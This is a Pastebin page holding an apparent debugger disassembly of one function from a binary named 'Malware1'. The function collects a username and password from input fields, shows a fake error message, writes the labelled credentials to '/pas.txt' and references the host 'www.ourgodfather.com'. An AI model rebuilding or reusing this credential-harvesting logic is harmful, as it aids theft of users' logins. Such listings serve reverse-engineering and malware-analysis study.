Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 0049642C /. 55 PUSH EBP
- 0049642D |. 8BEC MOV EBP,ESP
- 0049642F |. 81C4 20FEFFFF ADD ESP,-1E0
- 00496435 |. 53 PUSH EBX
- 00496436 |. 56 PUSH ESI
- 00496437 |. 33C9 XOR ECX,ECX
- 00496439 |. 898D 20FEFFFF MOV DWORD PTR SS:[EBP-1E0],ECX
- 0049643F |. 898D 28FEFFFF MOV DWORD PTR SS:[EBP-1D8],ECX
- 00496445 |. 898D 24FEFFFF MOV DWORD PTR SS:[EBP-1DC],ECX
- 0049644B |. 894D FC MOV DWORD PTR SS:[EBP-4],ECX
- 0049644E |. 894D F8 MOV DWORD PTR SS:[EBP-8],ECX
- 00496451 |. 8BD8 MOV EBX,EAX
- 00496453 |. 8B35 48A04900 MOV ESI,DWORD PTR DS:[49A048] ; Malware1.0049C058
- 00496459 |. 33C0 XOR EAX,EAX
- 0049645B |. 55 PUSH EBP
- 0049645C |. 68 F6664900 PUSH Malware1.004966F6
- 00496461 |. 64:FF30 PUSH DWORD PTR FS:[EAX]
- 00496464 |. 64:8920 MOV DWORD PTR FS:[EAX],ESP
- 00496467 |. 8D95 28FEFFFF LEA EDX,DWORD PTR SS:[EBP-1D8]
- 0049646D |. 8B83 70030000 MOV EAX,DWORD PTR DS:[EBX+370]
- 00496473 |. E8 E8DAFBFF CALL Malware1.00453F60
- 00496478 |. 83BD 28FEFFFF >CMP DWORD PTR SS:[EBP-1D8],0
- 0049647F |. 75 34 JNZ SHORT Malware1.004964B5
- 00496481 |. 8D95 24FEFFFF LEA EDX,DWORD PTR SS:[EBP-1DC]
- 00496487 |. 8B83 F8020000 MOV EAX,DWORD PTR DS:[EBX+2F8]
- 0049648D |. E8 CEDAFBFF CALL Malware1.00453F60
- 00496492 |. 83BD 24FEFFFF >CMP DWORD PTR SS:[EBP-1DC],0
- 00496499 |. 75 1A JNZ SHORT Malware1.004964B5
- 0049649B |. 6A 00 PUSH 0 ; /Arg1 = 00000000
- 0049649D |. 66:8B0D 046749>MOV CX,WORD PTR DS:[496704] ; |
- 004964A4 |. B2 02 MOV DL,2 ; |
- 004964A6 |. B8 10674900 MOV EAX,Malware1.00496710 ; |ASCII "The password field is empty, please type your password and try again.
- Error Code: 8004882e"
- 004964AB |. E8 2CBEF9FF CALL Malware1.004322DC ; \Malware1.004322DC
- 004964B0 |. E9 0B020000 JMP Malware1.004966C0
- 004964B5 |> A1 F4A14900 MOV EAX,DWORD PTR DS:[49A1F4]
- 004964BA |. C600 01 MOV BYTE PTR DS:[EAX],1
- 004964BD |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
- 004964BF |. 8B80 14030000 MOV EAX,DWORD PTR DS:[EAX+314]
- 004964C5 |. 8B10 MOV EDX,DWORD PTR DS:[EAX]
- 004964C7 |. FF92 C8000000 CALL DWORD PTR DS:[EDX+C8]
- 004964CD |. 3C 01 CMP AL,1
- 004964CF |. 74 14 JE SHORT Malware1.004964E5
- 004964D1 |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
- 004964D3 |. 8B80 10030000 MOV EAX,DWORD PTR DS:[EAX+310]
- 004964D9 |. 8B10 MOV EDX,DWORD PTR DS:[EAX]
- 004964DB |. FF92 C8000000 CALL DWORD PTR DS:[EDX+C8]
- 004964E1 |. 3C 01 CMP AL,1
- 004964E3 |. 75 0C JNZ SHORT Malware1.004964F1
- 004964E5 |> A1 B8A04900 MOV EAX,DWORD PTR DS:[49A0B8]
- 004964EA |. 8B00 MOV EAX,DWORD PTR DS:[EAX]
- 004964EC |. E8 2FD4FDFF CALL Malware1.00473920
- 004964F1 |> 8B06 MOV EAX,DWORD PTR DS:[ESI]
- 004964F3 |. 8B80 2C030000 MOV EAX,DWORD PTR DS:[EAX+32C]
- 004964F9 |. 8B10 MOV EDX,DWORD PTR DS:[EAX]
- 004964FB |. FF92 C8000000 CALL DWORD PTR DS:[EDX+C8]
- 00496501 |. 3C 01 CMP AL,1
- 00496503 |. 74 28 JE SHORT Malware1.0049652D
- 00496505 |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
- 00496507 |. 8B80 24030000 MOV EAX,DWORD PTR DS:[EAX+324]
- 0049650D |. 8B10 MOV EDX,DWORD PTR DS:[EAX]
- 0049650F |. FF92 C8000000 CALL DWORD PTR DS:[EDX+C8]
- 00496515 |. 3C 01 CMP AL,1
- 00496517 |. 74 14 JE SHORT Malware1.0049652D
- 00496519 |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
- 0049651B |. 8B80 28030000 MOV EAX,DWORD PTR DS:[EAX+328]
- 00496521 |. 8B10 MOV EDX,DWORD PTR DS:[EAX]
- 00496523 |. FF92 C8000000 CALL DWORD PTR DS:[EDX+C8]
- 00496529 |. 3C 01 CMP AL,1
- 0049652B |. 75 20 JNZ SHORT Malware1.0049654D
- 0049652D |> 8B06 MOV EAX,DWORD PTR DS:[ESI]
- 0049652F |. 8B80 48030000 MOV EAX,DWORD PTR DS:[EAX+348]
- 00496535 |. 8B10 MOV EDX,DWORD PTR DS:[EAX]
- 00496537 |. FF92 C8000000 CALL DWORD PTR DS:[EDX+C8]
- 0049653D |. 3C 01 CMP AL,1
- 0049653F |. 75 0C JNZ SHORT Malware1.0049654D
- 00496541 |. A1 A8A24900 MOV EAX,DWORD PTR DS:[49A2A8]
- 00496546 |. 8B00 MOV EAX,DWORD PTR DS:[EAX]
- 00496548 |. E8 F79DFDFF CALL Malware1.00470344
- 0049654D |> 8B83 04030000 MOV EAX,DWORD PTR DS:[EBX+304]
- 00496553 |. E8 30DFFBFF CALL Malware1.00454488
- 00496558 |. 8B83 0C030000 MOV EAX,DWORD PTR DS:[EBX+30C]
- 0049655E |. E8 2DDFFBFF CALL Malware1.00454490
- 00496563 |. 8D55 FC LEA EDX,DWORD PTR SS:[EBP-4]
- 00496566 |. 8B83 70030000 MOV EAX,DWORD PTR DS:[EBX+370]
- 0049656C |. E8 EFD9FBFF CALL Malware1.00453F60
- 00496571 |. 8D55 F8 LEA EDX,DWORD PTR SS:[EBP-8]
- 00496574 |. 8B83 F8020000 MOV EAX,DWORD PTR DS:[EBX+2F8]
- 0049657A |. E8 E1D9FBFF CALL Malware1.00453F60
- 0049657F |. 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
- 00496582 |. 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4]
- 00496585 |. BA 78674900 MOV EDX,Malware1.00496778 ; ASCII "Username: "
- 0049658A |. E8 ADE6F6FF CALL Malware1.00404C3C
- 0049658F |. 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8]
- 00496592 |. 8B4D F8 MOV ECX,DWORD PTR SS:[EBP-8]
- 00496595 |. BA 8C674900 MOV EDX,Malware1.0049678C ; ASCII "Password: "
- 0049659A |. E8 9DE6F6FF CALL Malware1.00404C3C
- 0049659F |. 8B15 70A14900 MOV EDX,DWORD PTR DS:[49A170] ; Malware1.0049C274
- 004965A5 |. 8B12 MOV EDX,DWORD PTR DS:[EDX]
- 004965A7 |. 8D85 20FEFFFF LEA EAX,DWORD PTR SS:[EBP-1E0]
- 004965AD |. B9 A0674900 MOV ECX,Malware1.004967A0 ; ASCII "/pas.txt"
- 004965B2 |. E8 85E6F6FF CALL Malware1.00404C3C
- 004965B7 |. 8B95 20FEFFFF MOV EDX,DWORD PTR SS:[EBP-1E0]
- 004965BD |. 8D85 2CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1D4]
- 004965C3 |. E8 4CC8F6FF CALL Malware1.00402E14
- 004965C8 |. 8D85 2CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1D4]
- 004965CE |. E8 DDC5F6FF CALL Malware1.00402BB0
- 004965D3 |. E8 E4C2F6FF CALL Malware1.004028BC
- 004965D8 |. BA B4674900 MOV EDX,Malware1.004967B4 ; ASCII "www.ourgodfather.com"
- 004965DD |. 8D85 2CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1D4]
- 004965E3 |. E8 24EAF6FF CALL Malware1.0040500C
- 004965E8 |. E8 6BCEF6FF CALL Malware1.00403458
- 004965ED |. E8 CAC2F6FF CALL Malware1.004028BC
- 004965F2 |. 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4]
- 004965F5 |. 8D85 2CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1D4]
- 004965FB |. E8 0CEAF6FF CALL Malware1.0040500C
- 00496600 |. E8 53CEF6FF CALL Malware1.00403458
- 00496605 |. E8 B2C2F6FF CALL Malware1.004028BC
- 0049660A |. 8B55 F8 MOV EDX,DWORD PTR SS:[EBP-8]
- 0049660D |. 8D85 2CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1D4]
- 00496613 |. E8 F4E9F6FF CALL Malware1.0040500C
- 00496618 |. E8 3BCEF6FF CALL Malware1.00403458
- 0049661D |. E8 9AC2F6FF CALL Malware1.004028BC
- 00496622 |. BA B4674900 MOV EDX,Malware1.004967B4 ; ASCII "www.ourgodfather.com"
- 00496627 |. 8D85 2CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1D4]
- 0049662D |. E8 DAE9F6FF CALL Malware1.0040500C
- 00496632 |. E8 21CEF6FF CALL Malware1.00403458
- 00496637 |. E8 80C2F6FF CALL Malware1.004028BC
- 0049663C |. 8D85 2CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1D4]
- 00496642 |. E8 95C8F6FF CALL Malware1.00402EDC
- 00496647 |. E8 70C2F6FF CALL Malware1.004028BC
- 0049664C |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
- 0049664E |. 8B80 74030000 MOV EAX,DWORD PTR DS:[EAX+374]
- 00496654 |. 8B10 MOV EDX,DWORD PTR DS:[EAX]
- 00496656 |. FF92 C8000000 CALL DWORD PTR DS:[EDX+C8]
- 0049665C |. 3C 01 CMP AL,1
- 0049665E |. 75 05 JNZ SHORT Malware1.00496665
- 00496660 |. E8 87FBFFFF CALL Malware1.004961EC
- 00496665 |> 33D2 XOR EDX,EDX
- 00496667 |. 8B83 F8020000 MOV EAX,DWORD PTR DS:[EBX+2F8]
- 0049666D |. E8 1ED9FBFF CALL Malware1.00453F90
- 00496672 |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
- 00496674 |. 8B80 48030000 MOV EAX,DWORD PTR DS:[EAX+348]
- 0049667A |. 8B10 MOV EDX,DWORD PTR DS:[EAX]
- 0049667C |. FF92 C8000000 CALL DWORD PTR DS:[EDX+C8]
- 00496682 |. 84C0 TEST AL,AL
- 00496684 |. 75 3A JNZ SHORT Malware1.004966C0
- 00496686 |. 6A 00 PUSH 0 ; /Arg1 = 00000000
- 00496688 |. A1 089E4900 MOV EAX,DWORD PTR DS:[499E08] ; |
- 0049668D |. 8B00 MOV EAX,DWORD PTR DS:[EAX] ; |
- 0049668F |. 66:8B0D 046749>MOV CX,WORD PTR DS:[496704] ; |
- 00496696 |. B2 02 MOV DL,2 ; |
- 00496698 |. E8 3FBCF9FF CALL Malware1.004322DC ; \Malware1.004322DC
- 0049669D |. 48 DEC EAX
- 0049669E |. 75 20 JNZ SHORT Malware1.004966C0
- 004966A0 |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
- 004966A2 |. 8B80 2C030000 MOV EAX,DWORD PTR DS:[EAX+32C]
- 004966A8 |. 8B10 MOV EDX,DWORD PTR DS:[EAX]
- 004966AA |. FF92 C8000000 CALL DWORD PTR DS:[EDX+C8]
- 004966B0 |. 84C0 TEST AL,AL
- 004966B2 |. 75 0C JNZ SHORT Malware1.004966C0
- 004966B4 |. A1 B8A04900 MOV EAX,DWORD PTR DS:[49A0B8]
- 004966B9 |. 8B00 MOV EAX,DWORD PTR DS:[EAX]
- 004966BB |. E8 60D2FDFF CALL Malware1.00473920
- 004966C0 |> 33C0 XOR EAX,EAX
- 004966C2 |. 5A POP EDX
- 004966C3 |. 59 POP ECX
- 004966C4 |. 59 POP ECX
- 004966C5 |. 64:8910 MOV DWORD PTR FS:[EAX],EDX
- 004966C8 |. 68 FD664900 PUSH Malware1.004966FD
- 004966CD |> 8D85 20FEFFFF LEA EAX,DWORD PTR SS:[EBP-1E0]
- 004966D3 |. E8 58E2F6FF CALL Malware1.00404930
- 004966D8 |. 8D85 24FEFFFF LEA EAX,DWORD PTR SS:[EBP-1DC]
- 004966DE |. BA 02000000 MOV EDX,2
- 004966E3 |. E8 6CE2F6FF CALL Malware1.00404954
- 004966E8 |. 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8]
- 004966EB |. BA 02000000 MOV EDX,2
- 004966F0 |. E8 5FE2F6FF CALL Malware1.00404954
- 004966F5 \. C3 RETN
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement